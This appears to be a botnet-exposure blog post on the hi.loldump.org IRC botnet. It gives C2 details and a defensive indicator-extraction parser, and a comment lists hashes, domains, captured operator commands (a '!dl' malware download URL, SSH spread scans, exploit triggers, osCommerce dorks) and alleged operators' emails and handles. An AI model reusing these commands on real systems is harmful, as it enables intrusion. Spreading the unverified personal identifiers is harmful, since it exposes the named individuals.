hi.loldump.org (IRC botnet hosted in France, Roubaix, OVH Systems)

Resolved: [hi.loldump.org] to [176.31.123.56]

Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {iNF-00-DEU-XP-DELL-9523}
Channel: #scanner# (Password: )
Channel topic: .join #scanner2 (the leading ":" in the raw TOPIC reply is the IRC trailing-parameter marker, not part of the topic; the bot is told to move on to #scanner2)

Hosting info:
http://whois.domaintools.com/176.31.123.56
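The connection details above are what an analyst gets back from letting the sample talk to its C2: a bot nick in a fixed template, a channel whose topic is a command, and further commands chained with ".join". The following parser is an added example, not code from the original post or from the botnet operators. It takes a raw IRC session transcript, handles the ":" trailing-parameter framing that produces lines like ":.join #scanner2", and pulls out the indicators a responder wants (bot nick, download URLs from "!dl", scan targets from ".scan", and the ".join" channel chain). The sample session embedded in it is constructed, modelled on the topics and hostnames quoted on this page; the interpretation of the nick fields (country, OS, host tag) is an assumption.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: raw IRC lines as a bot would receive them, modelled on the
# server name, nick, channel topics and download URL quoted on this page.
SAMPLE_SESSION = """\
:hi.loldump.org 001 {iNF-00-DEU-XP-DELL-9523} :Welcome to the Internet Relay Network
:hi.loldump.org 332 {iNF-00-DEU-XP-DELL-9523} #scanner# :.join #scanner2
:x00!x00@127.0.0.1 TOPIC #main :!dl http://interzoo.co.kr/bbs/zeknal2.exe -n
:x00!x00@127.0.0.1 TOPIC #scannerx :.ban |.scan sshspreadscan 5 5 0 41.x.x.x |.scan sshspreadscan 5 10 0 201.x.x.x |.join #scannerx2
:x00!x00@127.0.0.1 TOPIC #r# :.xpl 50 1 186 -b 3
:x00!x00@127.0.0.1 PRIVMSG #main :!dl http://interzoo.co.kr/bbs/zeknal2.exe -n
"""

# Bot nick template seen on this page: {iNF-<id>-<CCC>-<tag...>}
BOT_NICK_RE = re.compile(r"^\{iNF-\d+-[A-Z]{3}-[^}]+\}$")
DL_RE = re.compile(r"!dl\s+(https?://\S+)")
SCAN_RE = re.compile(r"\.scan\s+(\w+)\s+\d+\s+\d+\s+\d+\s+(\S+)")
JOIN_RE = re.compile(r"\.join\s+(#\S+)")


@dataclass
class IrcMessage:
    prefix: str
    command: str
    params: List[str]
    trailing: Optional[str]


def parse_irc_line(line: str) -> IrcMessage:
    """Split one RFC 1459 line into prefix, command, middle params and trailing param.

    The trailing parameter is introduced by ' :' and may contain spaces; that colon
    is protocol framing, which is why a raw TOPIC reply reads ':.join #scanner2'.
    """
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    return IrcMessage(prefix, parts[0].upper(), parts[1:], trailing if sep else None)


def describe_bot_nick(nick: str) -> dict:
    """Split the nick template into fields. Field names are an assumption
    (DEU looks like a country code, XP like the OS); the page does not document them."""
    body = nick.strip("{}")
    prefix, bot_id, country, os_tag, host_tag = body.split("-", 4)
    return {"prefix": prefix, "id": bot_id, "country": country, "os": os_tag, "host": host_tag}


@dataclass
class Iocs:
    bot_nicks: set = field(default_factory=set)
    download_urls: set = field(default_factory=set)
    scan_targets: set = field(default_factory=set)   # (scanner module, target range)
    join_chain: List[str] = field(default_factory=list)
    raw_commands: List[Tuple[str, str]] = field(default_factory=list)  # (channel, command)


def command_payload(msg: IrcMessage) -> Optional[Tuple[str, str]]:
    """Return (channel, text) for messages that can carry operator commands."""
    if msg.command == "332" and len(msg.params) >= 2 and msg.trailing:   # RPL_TOPIC on join
        return msg.params[1], msg.trailing
    if msg.command in ("TOPIC", "PRIVMSG") and msg.params and msg.trailing:
        return msg.params[0], msg.trailing
    return None


def extract_iocs(session: str) -> Iocs:
    """Walk a raw session transcript and collect the indicators in it."""
    iocs = Iocs()
    for line in session.splitlines():
        if not line.strip():
            continue
        msg = parse_irc_line(line)
        # RPL_WELCOME (001) is addressed to our own nick, i.e. the bot's generated name.
        if msg.command == "001" and msg.params and BOT_NICK_RE.match(msg.params[0]):
            iocs.bot_nicks.add(msg.params[0])
        found = command_payload(msg)
        if not found:
            continue
        channel, text = found
        # Operators chain several commands in one topic with '|'.
        for cmd in (c.strip() for c in text.split("|")):
            if not cmd:
                continue
            iocs.raw_commands.append((channel, cmd))
            for m in DL_RE.finditer(cmd):
                iocs.download_urls.add(m.group(1))
            for m in SCAN_RE.finditer(cmd):
                iocs.scan_targets.add((m.group(1), m.group(2)))
            for m in JOIN_RE.finditer(cmd):
                if m.group(1) not in iocs.join_chain:
                    iocs.join_chain.append(m.group(1))
    return iocs


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_SESSION)
    for nick in result.bot_nicks:
        print("bot nick:", nick, describe_bot_nick(nick))
    print("download URLs:", sorted(result.download_urls))
    print("scan targets:", sorted(result.scan_targets))
    print("join chain:", result.join_chain)
```

Feed it the transcript of a sandboxed run (or a proxy capture on port 8782) and the download URLs and scan ranges come out ready for blocking, while the join chain tells you which channels to watch next; the nick regex doubles as a quick hunt pattern for other infected hosts in IRC traffic on non-standard ports.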


1 Comment

ctrlaltdestroy_ - November 4, 2013 at 9:48 pm

Known Years in operation 2011-2013+

A few hashes:
D9A2A2A31E09B89BEE93C7E6A408D93E
0D77BFA58D58CEB81766D033C9D13AB0
1CB00FB1821A1B288BB28D738E71DA3E
71F4D7D3D6D6D56F8100956FD5AE48EA
E1FC5B55AFAD4DD490D39DA089C72AB3

Primary host: OVH
Primary IP: 37.59.53.162

A few domains used:
heytherebitch.com
Xxxd2.com
jorgee.nu
keshmoney.biz
smellypussy.info
loldump.org
haztuwebsite.com
webingenial.com
quiboxs.com
sunelectronix.com
lostradio.net
leetpm.info
e-qacs.com
r0x.info
sexyi.am
ngulesh.info
drshells.net
takohu.net
qiju.info
qijupra.info

Registrars:
eNOM Inc / reseller:namecheap
GoDaddy
TUCOWS DOMAINS INC. / Papaki Ltd, info@papaki.gr
abcdomain
WEBNAMES.RU / regtime
CLOUD GROUP LIMITED / hostingservicesinc.net
PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM / domains4bitcoins.com

Modded IRC:
Checks version on connect > if version response is not permitted > IP block
Parting channels = rejoin; to bypass, join #0,0 or disconnect/reconnect

#exploit#
TCL: !osco[w] "eshop/"+"catalogue/"+"osCsid="
TCL: !osco[w] "osc/"+"&osCsid="
TCL: !osco[w] "osc/"+"?osCsid="
TCL: !osco[w] "osc/"+"catalog/" "&osCsid="
TCL: !osco[w] "osc/"+"cataloge/" "&osCsid="
TCL: !osco[w] "powered by oscommerce" +/tienda/

#main
! Topic is '!dl http://interzoo.co.kr/bbs/zeknal2.exe -n'
! Set by x00 on Mon Nov 04

#scannerx
! Topic is '.ban |.scan sshspreadscan 5 5 0 41.x.x.x |.scan sshspreadscan 5 10 0 201.x.x.x |.scan sshspreadscan 5 10 0 200.x.x.x |.scan sshspreadscan 5 10 0 77.x.x.x |.scan sshspreadscan 5 10 0 80.x.x.x |.join #scannerx2'
! Set by x00 on Mon Nov 04

#r#
! Topic is '.xpl 50 1 186 -b 3'
! Set by x00 on Mon Nov 04

#boss
! Topic is '!dl http://interzoo.co.kr/bbs/zeknal2.exe -n'
! Set by x00 on Mon Nov 04 08:48:22

St0n3d: St0n3d@127.0.0.1
x00: x00@127.0.0.1
TCL: TCL@127.0.0.1
M: MaikiHax@lolhome
Jorgee: Jorgee@127.0.0.1

Some Social Data:
Drenushi@msn.com
bram226@gmail.com -> Lolita on Hackforums
->
lr:
u4056708 (Run Xbl)

Emails:
nade@hackingnation.org
brandon6374@aim.com
admin@teamnix.org
DarkWereWolf69@hotmail.com

AIMs:
bpbauburn1995
aa0nade
cfbluntman
cameronisfud

Sources and additional information:
http://pastebin.com/LYMA0Keq
http://anubis.iseclab.org/?action=result&task_id=1cd4833c7e8e68fc4c596c86872315503&format=html
http://eureka.cyber-ta.org/OUTPUT/41711c6a0eb71e094d0c88f3af96a7fa/
http://www.bitdefender.com/VIRUS-1000651-en--Backdoor-IRCBot-Dorkbot-A.html
http://ownedsecurity.blogspot.com/2011/06/smellypussyinfongrbot-very-large-irc.html
http://www.exposedbotnets.com/2011/11/mlsksfkajsfsacomngrbot-hosted-in.html
http://www.exposedbotnets.com/2012/03/supportleetpminfongrbot-from-burimi-big.html
http://www.exposedbotnets.com/2012/05/xxxd2comngrbot-hosted-in-united-states.html
http://www.threatexpert.com/report.aspx?md5=295da240a27bbdf63dbaffe30110dea7
http://www.exposedbotnets.com/2012/09/m74zaptoorg-rage-hosted-by-germany.html
http://www.exposedbotnets.com/2013/05/hiloldumporgirc-botnet-hosted-in-france.html
http://www.exposedbotnets.com/2013/05/irce-qacscomirc-botnet-hosted-in.html
http://www.exposedbotnets.com/2013/05/werehackedjpirc-botnet-hosted-in-france.html
